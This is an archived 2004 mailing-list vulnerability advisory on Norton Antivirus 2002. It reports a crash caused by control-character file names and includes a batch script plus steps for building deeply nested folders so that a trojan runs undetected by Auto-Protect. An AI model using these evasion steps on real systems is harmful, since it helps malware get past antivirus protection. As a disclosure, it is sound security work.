Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

NAV bugs!

From: Bipin Gautam <visitbipin () hotmail com>
Date: 7 Mar 2004 02:11:53 -0000


Subject: NAV bugs!
Published: Friday, 05 March, 2004
Updated: 06-Mar-04
Discovered By: Bipin Gautam ( hUNT3R ) 
Product Version: Norton Antivirus 2002 [ ver: 8.00.58 ] (~Only tested On...~)
Risk Impact: Low-Medium

*   *   *
Details: 

During a 'manual scan' of a folder, if Norton Antivirus (NAV) encounters a file /folder name with 'some'  ASCII 
characters ( 1-31) NAV can't further proceed the manual scan and its front-end 'NAVW32.exe' crashes! This Bug has no 
impact in the NAV Auto-Protect Engine.

Exploit 1). : Norton Antivirus 2002  fails to scan files with special character(s) properly.
http://www.geocities.com/visitbipin/test_nav.zip
Create a folder (say: '!' ) and put some sub-folders and files in it. The file/sub-folder name must contain  ASCII 
character(s)  ( 1-31) . Have a manual scan of the folder named '!' NAV can't  proceed the scan and crashes!

Exploit 2). : Norton Antivirus Auto-protect fails to stop a HOSTILE CODE... that is in the last sub dir. that windows 
OS can create!

 Run this batch script, first and make sure you have 95 sub-folders inside the folder named 
'----------------------------------------------------------------' in c:\ (root)



=-------CUT----------=
@echo off
echo ( you can use, http://www.eicar.org/anti_virus_test_file.htm)
echo for a harmless test... 
pause
cd\
c:
cd\
:hUNT3r 
md 1 
cd 1 
if not errorlevel  1 goto :hUNT3r
:rename
cd\
c:
cd\
ren 1 ----------------------------------------------------------------
explorer c:
exit

=-------CUT----------=

Now... drag/drop a trojan named 1.exe (that NAV recognises as a hostile program) to the 93'rd sub-folder and execute 
the program from there........ NAV-AUTO PROTECT is unable to scan/block the program & the trojan gets executed. 

[...THIS TECHNIQUE SHOULD WORK FOR SOME OTHER ANTIVIRUS PRODUCT TOO...]


[NOTE]---------------------------------------------------------------------------------------->
drag/drop the trojan code,  in a scene...... FOR TEST PURPOSE you either temporarily disable your NAV and copy a trojan 
there and then enable NAV then and then execute the trojan .  NAV is unable to scan/detect it as a virus...... when it 
gets executed!

OR

you create a blank file and / inject a hostile code named 1.* in the 93'rd sub directory....... and execute it! NAV IS 
UNABLE TO DETECT IT AS A VIRUS Ps: 93'rd directory is the last sub-folder that windows can create in the situation.....
NOTE]----------------------------------------------------------------------------------------<

Make sure the trojan/warm.exe just have a 1 character file-name! when it is executer from 93'rd sub directory! (...Last 
possible DIRECTORY where the file file can be copied!)
 

Disclaimer: The information in the advisory is believed to be accurate at the time of printing based on currently 
available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, 
indirect or consequential loss or damage arising from use of, or reliance on this information.
Previous By Date Next
Previous By Thread Next

Current thread: